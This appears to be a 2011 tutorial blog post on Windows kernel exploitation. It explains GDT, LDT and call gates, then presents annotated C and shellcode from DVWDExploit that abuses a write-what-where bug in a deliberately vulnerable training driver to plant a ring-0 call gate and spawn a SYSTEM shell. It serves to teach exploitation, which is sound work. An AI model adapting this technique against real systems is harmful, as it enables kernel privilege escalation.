dimanche 17 juillet 2011

Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



In the previous post, we've seen an exploitation of the write-what-where vulnerability in DVWDDriver based on the overwriting of a pointer located into the kernel dispatch table HalDispatchTable. This technique relies on an undocumented syscall, and so the problem with such a technique is that it is not guaranteed to remain in the same form in the next system updates as it is well pointed out in the great paper [1]. Instead, the new technique detailed in this post is based on the hardware-specific structures GDT and LDT that are more likely to remain the same across the different Windows versions. This is another method that is briefly presented in the book "A guide to Kernel Exploitation". First of all, background about GDT and LDT is required, so we'll take our Intel Manual and see that now =)

1. Windows GDT and LDT

According to the Intel Manual [2], Segmentation is implemented using Segment Selector which is a 16-bit value. Actually, a Logical Address is composed of:
  • An offset address, which is a 32-bits value,
  • A Segment Selector, which is a 16-bits value.
Because a figure permits to avoid a long speech, here's a global overview of Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



    The previous figure shows how the logical address is translated into a linear address thanks to Segmentation. Then, we can see that the Paging mechanism comes in play. Basically, it consists in translating the linear address into physical address. It is actually an Intel optional feature but if not used, linear address == physical address. Windows uses Paging and so, the linear address is just another structure split into 3 subfields. The values of those subfields are used as offsets into arrays in order to get the physical address.

    Moreover, we can see that the Segment Selector references an entry in a table and this entry actually describes a segment (Segment Descriptor) in linear address space: this table is the GDT. Ok, but how's really working and wtf is that LDT ?! Let's go back to our Intel Manual... =)

    We learn that GDT (Global Descriptor Table) and LDT (Local Descriptor Table) are the 2 kinds of Segment Descriptors tables. We can also see this awesome figure:



    Having a GDT is mandatory for a system, every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table) and that can be shared by all tasks on the system. Using a LDT is actually optional ; it can nevertheless be used by a single task or a group of tasks that are in relation. A LDT is defined as a single GDT entry and it is specific to a process, which means that the entry is replaced into the GDT during a process-context switch.

    To give more details, the GDT normally contains:
    • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, ie. the ring)
    • A pair of user-mode code and data Segment Descriptors, with DPL = 3
    • One TSS (Task State Segment), with DPL = 0. See [3]
    • 3 Additional data segment entries.
    • An optional LDT entry
    By default, a new process doesn't have any LDT defined, however it can be allocated if the process sends a demand to create it. If a process has a corresponding LDT, a pointer can be found in the LdtDescriptor field of the kernel structure _KPROCESS corresponding to the process in question:

    kd> dt nt!_kprocess
       +0x000 Header           : _DISPATCHER_HEADER
       +0x010 ProfileListHead  : _LIST_ENTRY
       +0x018 DirectoryTableBase : [2] Uint4B
       +0x020 LdtDescriptor    : _KGDTENTRY
       +0x028 Int21Descriptor  : _KIDTENTRY
       [...]
    

    2. Call-Gate

    A Call-Gate permits to access code segments with different privilege levels:
    "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

    A Call-Gate is a possible entry into GDT or LDT. It is a special sort of descriptor called a Call-Gate Descriptor. It's the same size as a Segment Descriptor (8 bytes), but some fields aren't organized in the same way. The figure below is taken from [1] and clearly shows the differences:



    In practice, a Call-Gate is useful in order to jump to a code located to a different segment and running with different privileges (ring). Here's how things are working when we're calling a Call-Gate:
    1. The processor accesses the Call-Gate Descriptor,
    2. It locates the Code Segment Descriptor we finally want to access, by using the Segment Selector contained into the Call-Gate Descriptor,
    3. It retrieves the Base Address contained into the Code Segment Descriptor and adds to it the offset value contained into the Call-Gate Descriptor.
    4. The result is the linear address of the code we want to access (Code linear address = Base Address + Offset).

    The article [4] (in french) explains how we can add a Call-Gate that permits to run code in Ring0 from Ring3. So, I'll not repeat all what it's said in that great article, but just what is useful for us right now:

    • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
    • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from the userland.
    • The "Offset" field must be the address of the code we want to execute.
    • The "Type" field must be equal to 12 for Call-Gate Descriptor.
    After that, we need to know how to call our Call-Gate...
    For that, we'll use the x86 instruction FAR CALL (0x9A). It's different from a classic CALL because we must specify an offset (32-bits) AND a Segment Selector (16-bits). In our case, we just need to put the right value for the Segment Selector, and we just have to leave the index at 0x00000000. Indeed, here we're doing like a call in two times; I mean the first call is aimed to reach the Call-Gate Descriptor and then the Call-Gate Descriptor points to the code we want to execute. Let's see how is built a Segment Selector:
    So:
    • Bits 0,1: we call the Call-Gate from userland, so we'll put the value 11 (3 in decimal for Ring3) here;
    • Bit 2: we'll put the value 1 because we'll put our Call-Gate Descriptor into LDT;
    • Bits 3..15: this is the index into GDT/LDT (here into LDT). We'll put our Call-Gate at the first position into the LDT, so we'll put the value 0 here.

    3. Methodology of exploitation

    Now that we've got the background about GDT and LDT we can move on to the exploitation...
    Basically, the exploitation consists in creating a new LDT. Then, we add a new entry into that LDT - just one entry - a Call-Gate Descriptor by putting the right values in the fields as it was explained before...


    And then, we need to use the write-what-where vulnerability in order to overwrite the LDT descriptor into the GDT by a descriptor corresponding to the fake LDT that has been previously created. Here:
    • what = LDT descriptor of the fake LDT,
    • where = location of the LDT descriptor into the GDT. The LDT is represented by a KGDTENTRY structure called LdtDescriptor, that is an entry into the _KPROCESS structure (structure used by the kernel to store information about a specific process) as we've seen before. So, we can get the address of where we want to write by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding to it the right offset value (0x20 for Windows Server 2003 SP2). 
    Finally, we can call our Call-Gate by making a FAR CALL on the first (and only) entry into the LDT of the current process. This will permit to jump to our shellcode.

    4. Shellcoding

    Okay, we've briefly seen how the exploitation is working. We will re-use the shellcode used in the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here... we need to be able to return from the Call-Gate after the execution of our payload. A FAR CALL will be made to jump to the Call-Gate, that's to say the segment where EIP is pointing will change, and so we need to make a FAR RET (0xCB) and not a simple RET after the execution. By doing so, we will be able to move on to the next instruction into our exploit program.

    Moreover, it's important to remember that the FS segment descriptor is pointing to the KPCR structure (Kernel Processor Control Region) in kernel-mode, but not in user-mode where it is pointing to the TEB structure (Thread Execution Block). Indeed:
    • In Kernel-Mode, FS=0x30
    • In User-Mode, FS=0x3B
    Therefore, we have to correctly set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.

    This is for the two previous reasons that the authors of the DVWDExploit have written a wrapper (ReturnFromGate) in ASM that performs those operations. This is the address of this wrapper that must be put into the Offset field of the Call-Gate Descriptor.

    5. Exploitation in details

    Okay, we've got all the elements to fully understand the exploit. Here is how it works:
    1. Retrieve the address of the payload that will be executed in Kernel-mode (named KernelPayload), that's to say the code to patch the current process' Access Token.
    2. Retrieve the address of the _KPROCESS structure.
    3. Retrieve the address of the LDT descriptor into the GDT, located at address of _KPROCESS + offset (0x20)
    4. Create a new LDT using the ZwSetInformationProcess() syscall within ntdll.dll. This is done in the function called SetLDTEnv().
    5. Put the address KernelPayload into the wrapper ReturnFromGate to be able to call the shellcode from it. Then, put this wrapper into executable memory.
    6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). Well, we've already seen how to correctly fill the fields of the Call-Gate in order to be able to run code in Ring0 from Ring3.
    7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32()
    8. Overwrite the LDT descriptor into the GDT by the one corresponding to the fake LDT that has been previously created, by using the vulnerability:
      • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
      • Write this new LDT descriptor - contained into GlobalOverwriteStruct - at the location of the existing LDT descriptor into GDT, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
    9. Then, we need to force a process context switch. Indeed, the LDT Segment Descriptor into the GDT is updated only after a context switch. To do so, we just sleep for some time.
    10. Finally, we make our FAR CALL to the Call-Gate. That will trigger the execution of the wrapper and then of our shellcode in kernel-mode.
    11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do what we want ! 
    A figure might help to understand... =) 




    6. Exploit code

    Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

    // ----------------------------------------------------------------------------
    // Arbitrary Memory Overwrite exploitation ------------------------------------
    // ---- Method using LDT  -----------------------------------------------------
    // ----------------------------------------------------------------------------
    
    
    typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                           PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                           PPROCESS_LDT_INFORMATION ProcessInformation,
                           ULONG ProcessInformationLength);    
    
    // Fill the Call-Gate Descriptor -------------------------------------------------
    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
    
     ULONG_PTR IPayload = (ULONG_PTR)Payload;
    
     RtlZeroMemory(pGate, sizeof(CALL_GATE32));
     
     pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
     pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
     pGate->Fields.Type     = 12;   // Gate Descriptor
     pGate->Fields.Param    = 0;
     pGate->Fields.Present    = 1;
     pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
     pGate->Fields.Dpl     = 3;
    }
    
    // Setup the LDT descriptor ------------------------------------------------------
    VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
    
     ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
    
     RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
     
     pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
     pLDTDesc->LimitLow     = 0xFFFF;
     pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
     pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
     pLDTDesc->HighWord.Bits.Type = 2;
     pLDTDesc->HighWord.Bits.Pres  = 1;
    }
    
    
    // Assembly wrapper to the payload to be able to return from the Call-Gate ------
    // (using a FAR RET)
    #define OFFSET_SHELLCODE 18
    CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x60"                  // pushad       save general purpose registers
           "\x0F\xA0"              // push  fs     save FS segment register
           "\x66\xB8\x30\x00"      // mov  ax, 30h   
           // FS value is different between userland (0x3B) and kernelland (0x30)
           "\x8E\xE0"              // mov  fs, ax     
           "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
           "\xFF\xD0"              // call  eax  
           "\x0F\xA1"              // pop   fs     restore general purpose registers
           "\x61"                  // popad        restore FS segment register
           "\xcb";                 // retf       far ret
    
           
    // Assembly code that executes a CALL to 0007:00000000 ----------------------------
    // (Segment selector: 0x0007, offset address: 0x00000000)
    // 16-bit segment selector:
    // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
    // [Requested Privilege Level: 00=ring0/11=ring3]
    // => 0007 means: index 0 into GDT (first entry), descriptor in LDT, ring3
    VOID FarCall() {
     __asm { 
       _emit 0x9A
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x07
       _emit 0x00
     }
    }
    
    // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
    BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
    
     HANDLE hFile;
     ARBITRARY_OVERWRITE_STRUCT overwrite;
     ULONG64 storage = LDTDesc;
     BOOL ret;
     DWORD dwReturn;
    
     hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    
     if(hFile != INVALID_HANDLE_VALUE) {
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)&storage;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)KGDTEntry;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      CloseHandle(hFile);
    
      return TRUE;
     }
    
     return FALSE;
    }
    
    
    // Create a new LDT using ZwSetInformationProcess ----------------------------------
    BOOL SetLDTEnv(VOID) {
    
     NTSTATUS retStatus;
     LDT_ENTRY eLdt;
     PROCESS_LDT_INFORMATION infoLdt; 
     _ZwSetInformationProcess ZwSetInformationProcess;
    
     // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
     ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
    
     if(!ZwSetInformationProcess)
      return FALSE;
    
     // Create and initialize a new LDT
     RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
    
     RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
     infoLdt.Start = 0;
     infoLdt.Length = sizeof(LDT_ENTRY);
    
     retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                 ProcessLdtInformation, 
                 &infoLdt, 
                 sizeof(PROCESS_LDT_INFORMATION));
    
     if(retStatus != STATUS_SUCCESS)
      return FALSE;
    
     return TRUE;
    }
    
    
    #define LDT_DESC_FROM_KPROCESS 0x20
    ULONG64 LDTDescStorage32=0;
    
    // Main function -------------------------------------------------------------------
    BOOL LDTDescOverwrite32(VOID) {
    
     PVOID kprocess,kprocessLDTDesc;
     PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
     PVOID ReturnFromGateArea = NULL;
     PCALL_GATE32 pGate = NULL;
    
     // User standard SIDList Patch
     FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
    
     // Retrieve the KPROCESS Address == EPROCESS Address
     kprocess = FindCurrentEPROCESS();
     if(!kprocess)
      return FALSE;
    
     // Address of LDT Descriptor
     // kd> dt nt!_kprocess
     kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
     printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
    
     // Create a new LDT entry
     if(!SetLDTEnv())
      return FALSE;
    
     // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
     // and put it into executable memory
     RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
     ReturnFromGateArea = CreateUspaceExecMapping(1);
     RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
    
     // Build the Call-Gate(system descriptor), we pass the address of the shellcode
     pGate = CreateUspaceMapping(1);
     PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
    
     // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
     PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
    
     printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
    
     // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
     OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
     
     // We force a process context switch
     // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
     // switch. So, it's needed before being able to use the Call-Gate
     Sleep(1000);
    
     // Trigger the call gate via a FAR CALL (see assembly code)
     FarCall();
    
     return TRUE;
    }
    
    
    // This is where we begin ... ------------------------------------------------
    BOOL TriggerOverwrite32_LDTRemappingWay() {
     
     // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
     if(LoadAndGetKernelBase() == FALSE)
      return FALSE;
    
     // We exploit the vulnerability with a payload that patches the SID list to get 
     // SYSTEM privilege and then we spawn a shell if it succeeds
     if(LDTDescOverwrite32() == TRUE) {
      if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
       wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
       return FALSE;
      }
     }
     
     return TRUE;
    }
    


    7. w00t ?


    The exploit is working well as we can see:

    w00t again !!


    References

    [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

    [2] Intel Manual Vol. 3A & 3B
    http://www.intel.com/products/processor/manuals/

    [3]
    Task State Segment (TSS)